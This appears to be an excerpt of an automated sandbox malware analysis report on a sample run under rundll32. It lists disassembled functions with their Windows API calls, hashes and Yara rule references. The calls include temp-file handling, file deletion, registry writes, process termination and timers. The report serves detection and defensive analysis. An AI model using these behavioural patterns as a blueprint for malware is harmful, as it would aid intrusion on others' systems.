                                                          • Instruction ID: 0740d0eb13414ea46ba8451a6da6baba620c32ca1079df7051776d4185eea63d
                                                          • Opcode Fuzzy Hash: dece8f0c3aed061c788cd055be7266738e4e499b1c6321b35e8c088ee1fe3dd0
                                                          • Instruction Fuzzy Hash: 1031C232A04115FBCB21AFA4DC89ABD7BB5FB44B51F124426F905A6140DA7C9A48EBD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05578282, Relevance: 10.6, APIs: 7, Instructions: 110memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 055782C8
                                                          • StrTrimA.SHLWAPI(?,?), ref: 055782E6
                                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 0557834F
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 05578370
                                                          • DeleteFileA.KERNEL32(?,00003219), ref: 05578392
                                                          • HeapFree.KERNEL32(00000000,?), ref: 055783A1
                                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 055783B9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1078934163-0
                                                          • Opcode ID: e6552cc1e0cb17b243898c1f3d386ba77018b3ac8e74a8b6bd6c94060e33696d
                                                          • Instruction ID: 1d9d6486908df21a7ef9b0bc2aee86c27bb8363084c99c91ee014342bcb6524c
                                                          • Opcode Fuzzy Hash: e6552cc1e0cb17b243898c1f3d386ba77018b3ac8e74a8b6bd6c94060e33696d
                                                          • Instruction Fuzzy Hash: 6C31E73220820AAFE710EB99EC49F6A7BECFF44754F050416F644D7180DB68E909DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05587F89, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,0558C8F5,00000000), ref: 05587FA3
                                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 05587FB8
                                                          • memset.NTDLL ref: 05587FC5
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0558C8F4,055764CD,?,00000000), ref: 05587FE2
                                                          • memcpy.NTDLL(?,055764CD,0558C8F4,?,0558C8F4,055764CD,?,00000000), ref: 05588003
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freememcpymemset
                                                          • String ID: chun
                                                          • API String ID: 2362494589-3058818181
                                                          • Opcode ID: 7bd266290300a6a542811ee996368273c2a0db5c58bd9611f73987113c62b8ea
                                                          • Instruction ID: cfd13452d3c0d1481e17006ff615a4bae5712b203d33a7416f0fed74a4f3cfff
                                                          • Opcode Fuzzy Hash: 7bd266290300a6a542811ee996368273c2a0db5c58bd9611f73987113c62b8ea
                                                          • Instruction Fuzzy Hash: 8E319C71604706EFD720EF56D845E26BBE8FF44320F06482AE95AE7660DB30F945DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558590E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91memoryfilestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • lstrlen.KERNEL32(00000000,?,00000F00), ref: 05585932
                                                            • Part of subcall function 0557DD74: lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD85
                                                            • Part of subcall function 0557DD74: lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,05585956,?,00000000,000000FF,?,00000F00), ref: 0557DD8C
                                                            • Part of subcall function 0557DD74: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0557DD9E
                                                            • Part of subcall function 0557DD74: _snprintf.NTDLL ref: 0557DDC4
                                                            • Part of subcall function 0557DD74: _snprintf.NTDLL ref: 0557DDF8
                                                            • Part of subcall function 0557DD74: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 0557DE15
                                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,000000FF,?,00000F00), ref: 055859CC
                                                          • HeapFree.KERNEL32(00000000,?,000000FF,?,00000F00), ref: 055859E9
                                                          • DeleteFileA.KERNEL32(00000000,00000000,?,?,?,00000000,000000FF,?,00000F00), ref: 055859F1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF,?,00000F00), ref: 05585A00
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                          • String ID: s:
                                                          • API String ID: 2960378068-2363032815
                                                          • Opcode ID: a30573efceaf376d346fe02704f91b4d224cf883a5260b6fb77ec5fa11c43bb5
                                                          • Instruction ID: 2326431261d63b7bafff136ef170b208f03fd1a922f48558ec4a49b56a2647e0
                                                          • Opcode Fuzzy Hash: a30573efceaf376d346fe02704f91b4d224cf883a5260b6fb77ec5fa11c43bb5
                                                          • Instruction Fuzzy Hash: C7314D72A0421ABFDB10ABA9DC89FAE7FBCBB48210F010555B515E3141FB78A6089B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0558FDC5, Relevance: 10.6, APIs: 7, Instructions: 83stringfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 0558FDDB
                                                          • lstrcmpiW.KERNEL32(00000000,?,7519F710,?,?,?,0558D218), ref: 0558FE13
                                                          • lstrcmpiW.KERNEL32(?,?,?,?,?,0558D218), ref: 0558FE28
                                                          • lstrlenW.KERNEL32(?,?,?,?,0558D218), ref: 0558FE2F
                                                          • CloseHandle.KERNEL32(?,?,?,?,0558D218), ref: 0558FE57
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,0558D218), ref: 0558FE83
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0558FEA1
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                          • String ID:
                                                          • API String ID: 1496873005-0
                                                          • Opcode ID: ae22562aa99bced2f10d9ecdde3295cd448e623d21a14064e83a6df1b6b0e63e
                                                          • Instruction ID: 12ea0c5b61a0d054b1489b5e13c408ab868e22752da9021c28183ca5d5bc7863
                                                          • Opcode Fuzzy Hash: ae22562aa99bced2f10d9ecdde3295cd448e623d21a14064e83a6df1b6b0e63e
                                                          • Instruction Fuzzy Hash: AF214F71610305AFDF10AFB1EC85E7B7BBDFF48644B051529B502E2111EB38E908EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05584246, Relevance: 10.6, APIs: 7, Instructions: 76memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(0558ED52,00000000,0559C320,0559C340,?,?,0558ED52,05576398,0559C320), ref: 05584256
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0558426C
                                                          • lstrlen.KERNEL32(05576398,?,?,0558ED52,05576398,0559C320), ref: 05584274
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05584280
                                                          • lstrcpy.KERNEL32(0559C320,0558ED52), ref: 05584296
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0558ED52,05576398,0559C320), ref: 055842EA
                                                          • HeapFree.KERNEL32(00000000,0559C320,?,?,0558ED52,05576398,0559C320), ref: 055842F9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                          • String ID:
                                                          • API String ID: 1531811622-0
                                                          • Opcode ID: 5d3f1f3badc069d836ffc811fff99ef4759e0f1c387b9e2197e385223cba332c
                                                          • Instruction ID: d6c4e356078e987ba881f5b49950fdaa17f21a29a906bec1af11ea6efaaec037
                                                          • Opcode Fuzzy Hash: 5d3f1f3badc069d836ffc811fff99ef4759e0f1c387b9e2197e385223cba332c
                                                          • Instruction Fuzzy Hash: D421073110C286EFEF225FA5DC85F7A7F6AFB46354F06005AF84657250CB35A81ADB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557674A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,?,?), ref: 0557676E
                                                            • Part of subcall function 055829A6: lstrcpy.KERNEL32(-000000FC,00000000), ref: 055829E0
                                                            • Part of subcall function 055829A6: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 055829F2
                                                            • Part of subcall function 055829A6: GetTickCount.KERNEL32 ref: 055829FD
                                                            • Part of subcall function 055829A6: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 05582A09
                                                            • Part of subcall function 055829A6: lstrcpy.KERNEL32(00000000), ref: 05582A23
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • lstrcpy.KERNEL32(00000000), ref: 055767A9
                                                          • wsprintfA.USER32 ref: 055767BC
                                                          • GetTickCount.KERNEL32 ref: 055767D1
                                                          • wsprintfA.USER32 ref: 055767E6
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                          • String ID: "%S"
                                                          • API String ID: 1152860224-1359967185
                                                          • Opcode ID: 3ba9abf36c30b66cf869ca98e6649a427730945e217c09c3ff4dbcec09c19413
                                                          • Instruction ID: 687554dd4f0844de7b97c75d7298d54a78967f1839e1b66f58ea9dbf88c55a66
                                                          • Opcode Fuzzy Hash: 3ba9abf36c30b66cf869ca98e6649a427730945e217c09c3ff4dbcec09c19413
                                                          • Instruction Fuzzy Hash: 9E11D37261461ABFD6107BA5AC48D6F3B9CFF85614F064016F909A7201DF38AC085BB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05572C0B, Relevance: 10.6, APIs: 7, Instructions: 71filememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00001ED2,?,00000000,?,?,05577963,00000000,00000000,00000004), ref: 05572C4C
                                                          • HeapFree.KERNEL32(00000000,00000000,00001ED2,?,00000000,?,?,05577963,00000000,00000000,00000004,?,00000000,?,00000000,?), ref: 05572CBF
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 2078930461-0
                                                          • Opcode ID: 82fb269f0b6e674efba2ce1e45eff06f94435ad8a9dbf71b1f89da148e98411c
                                                          • Instruction ID: a2841ab481ae66957e1112f6100b051a696f867a2bfb3ffc287c4901be1ff955
                                                          • Opcode Fuzzy Hash: 82fb269f0b6e674efba2ce1e45eff06f94435ad8a9dbf71b1f89da148e98411c
                                                          • Instruction Fuzzy Hash: 46110135250219BBD2312B21BC8EF6F3E5DFB457A0F020526F602A5180EB69585C96E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055756B8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0557D15B: lstrlen.KERNEL32(00000000,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 0557D1C2
                                                            • Part of subcall function 0557D15B: sprintf.NTDLL ref: 0557D1E3
                                                          • lstrlen.KERNEL32(00000000,751881D0,?,00000000,00000000,?,?,05581B69,00000000,059BB188), ref: 055756E3
                                                          • lstrlen.KERNEL32(?,?,?,05581B69,00000000,059BB188), ref: 055756EB
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • strcpy.NTDLL ref: 05575702
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0557570D
                                                            • Part of subcall function 05572D8B: lstrlen.KERNEL32(?,?,?,00000000,?,0557571C,00000000,?,?,?,05581B69,00000000,059BB188), ref: 05572D9C
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,05581B69,00000000,059BB188), ref: 0557572A
                                                            • Part of subcall function 0559302E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,05575736,00000000,?,?,05581B69,00000000,059BB188), ref: 05593038
                                                            • Part of subcall function 0559302E: _snprintf.NTDLL ref: 05593096
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 8c0732675958dca6530f67979c55f5afbb43c3914eeecf15c85f78b9854b7327
                                                          • Instruction ID: b154d3cabed783073b88e4f747f406aa77937cd40d669d36ae7af945934f4125
                                                          • Opcode Fuzzy Hash: 8c0732675958dca6530f67979c55f5afbb43c3914eeecf15c85f78b9854b7327
                                                          • Instruction Fuzzy Hash: 3911A037A1052EB787127BBAACC8C6E3AADBEC66907050056F505E7200DF78DD0697E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05589CEF, Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05589D20
                                                          • wcstombs.NTDLL ref: 05589D31
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E0B
                                                            • Part of subcall function 05585DF9: StrChrA.SHLWAPI(?,00000020,?,00000000,05580CCA,00000000,?,00000000,?,?,?,?,?,?), ref: 05585E1A
                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 05589D52
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 05589D61
                                                          • CloseHandle.KERNEL32(00000000), ref: 05589D68
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 05589D77
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 05589D87
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 417118235-0
                                                          • Opcode ID: dbd0ac2525bf37e7dbfc780786b4822553275495e634afd79861ecdcf1965bb8
                                                          • Instruction ID: e4e251907dbbd159dd3d40bd55db9cc001c3e93a9802ed83c26b106dc761df36
                                                          • Opcode Fuzzy Hash: dbd0ac2525bf37e7dbfc780786b4822553275495e634afd79861ecdcf1965bb8
                                                          • Instruction Fuzzy Hash: 92110131105606FBEB216B54DC8AFBE7FB9FF00355F010012F902A6180CBB9E858EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055829A6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,75145520,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 055919EE
                                                            • Part of subcall function 055919DC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A07
                                                            • Part of subcall function 055919DC: GetCurrentThreadId.KERNEL32 ref: 05591A14
                                                            • Part of subcall function 055919DC: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A20
                                                            • Part of subcall function 055919DC: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0557D433,00000000,?,00000000,00000000,?), ref: 05591A2E
                                                            • Part of subcall function 055919DC: lstrcpy.KERNEL32(00000000), ref: 05591A50
                                                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 055829E0
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 055829F2
                                                          • GetTickCount.KERNEL32 ref: 055829FD
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,0557677B,?,?,?), ref: 05582A09
                                                          • lstrcpy.KERNEL32(00000000), ref: 05582A23
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                          • String ID: \Low
                                                          • API String ID: 1629304206-4112222293
                                                          • Opcode ID: 8e5649f567339a49cf0619c93dac08a915626b575334c0c94668525658b4ad7e
                                                          • Instruction ID: fd0937c6224ba8834e308a92c5019fe272683a4ebaa84037bc6b9c62645a0f15
                                                          • Opcode Fuzzy Hash: 8e5649f567339a49cf0619c93dac08a915626b575334c0c94668525658b4ad7e
                                                          • Instruction Fuzzy Hash: 60012E356156297BD6216B76AC8EFBF3F9CFF06251F020022F101E2140CFACE9098AB4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05592C06, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 05592C19
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 05592C2B
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 05592C55
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05592C68
                                                          • CloseHandle.KERNEL32(?), ref: 05592C71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                          • String ID: 0x%08X
                                                          • API String ID: 603522830-3182613153
                                                          • Opcode ID: 025ac8afd19ca8a71b745f4f7fcd6632f0c4131f4eb4e29878714fcd39c40171
                                                          • Instruction ID: 1d759b39933249f722ad62e4d5de13da6ecf41aae188ef66d72f4fab3f29e92f
                                                          • Opcode Fuzzy Hash: 025ac8afd19ca8a71b745f4f7fcd6632f0c4131f4eb4e29878714fcd39c40171
                                                          • Instruction Fuzzy Hash: 93015E71900119BBDB109BA4DC4ADEF7F7CFF05354F004115F516E2181DB79A609DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 055771E6, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
                                                          • GetLastError.KERNEL32(?,?,?,00001000), ref: 05577267
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 055772EC
                                                          • CloseHandle.KERNEL32(00000000), ref: 05577306
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0557733B
                                                            • Part of subcall function 05582936: RtlReAllocateHeap.NTDLL(00000000,?,?,055772AA), ref: 05582946
                                                          • WaitForSingleObject.KERNEL32(?,00000064), ref: 055773BD
                                                          • CloseHandle.KERNEL32(?), ref: 055773E4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                          • String ID:
                                                          • API String ID: 3115907006-0
                                                          • Opcode ID: 8b69feb5844ae59893a38b48f73ee304f4357e31cdef0bc3089e628adc2cb70b
                                                          • Instruction ID: 08b4fc44edf491a2d3076e0445553589df8aa6cd74d4a720a4cf9d02bae8b3bd
                                                          • Opcode Fuzzy Hash: 8b69feb5844ae59893a38b48f73ee304f4357e31cdef0bc3089e628adc2cb70b
                                                          • Instruction Fuzzy Hash: 7D813871E10219EFDF11DFA4E984AADBBB6FF08344F158459E91AAB250D730A950CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0557D203, Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 055714EC
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?,?,77A31120), ref: 055714F8
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 05571540
                                                            • Part of subcall function 055714A0: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0557155B
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(0000002C), ref: 05571593
                                                            • Part of subcall function 055714A0: lstrlenW.KERNEL32(?), ref: 0557159B
                                                            • Part of subcall function 055714A0: memset.NTDLL ref: 055715BE
                                                            • Part of subcall function 055714A0: wcscpy.NTDLL ref: 055715D0
                                                          • WaitForSingleObject.KERNEL32(00000000,?,059B993C,?,00000000,00000000,00000001), ref: 0557D2AD
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0557D2E7
                                                          • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 0557D30A
                                                          • RegCloseKey.ADVAPI32(?), ref: 0557D313
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0557D377
                                                          • RtlExitUserThread.NTDLL(?), ref: 0557D3AD
                                                            • Part of subcall function 05580538: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,0558820A,00000000,?,?), ref: 05580556
                                                            • Part of subcall function 05580538: GetFileSize.KERNEL32(00000000,00000000,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 05580566
                                                            • Part of subcall function 05580538: CloseHandle.KERNEL32(000000FF,?,?,0558820A,00000000,?,?,?,00000000,?,05582174,?,?,?), ref: 055805C8
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                            • Part of subcall function 0558C45A: GetLastError.KERNEL32 ref: 0558C4A5
                                                            • Part of subcall function 0558C45A: WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                            • Part of subcall function 0558C45A: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                            • Part of subcall function 0558C45A: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                            • Part of subcall function 0558C45A: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                            • Part of subcall function 0558C45A: SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                            • Part of subcall function 0558C45A: CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
                                                          • String ID:
                                                          • API String ID: 90276831-0
                                                          • Opcode ID: b9afc6036ecf32060594689792ffcc11db2085a9311e1d9d449c647285684fe7
                                                          • Instruction ID: aa7fb924b957b826d2e03205f2c72a42b8d95b91fb64cd86280c9b20c0e0e424
                                                          • Opcode Fuzzy Hash: b9afc6036ecf32060594689792ffcc11db2085a9311e1d9d449c647285684fe7
                                                          • Instruction Fuzzy Hash: A0516271A10209AFDB10DFA5E88AEAE7BF9FF08314F014056F504E7250EB78A949EB54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 05577CBE, Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON
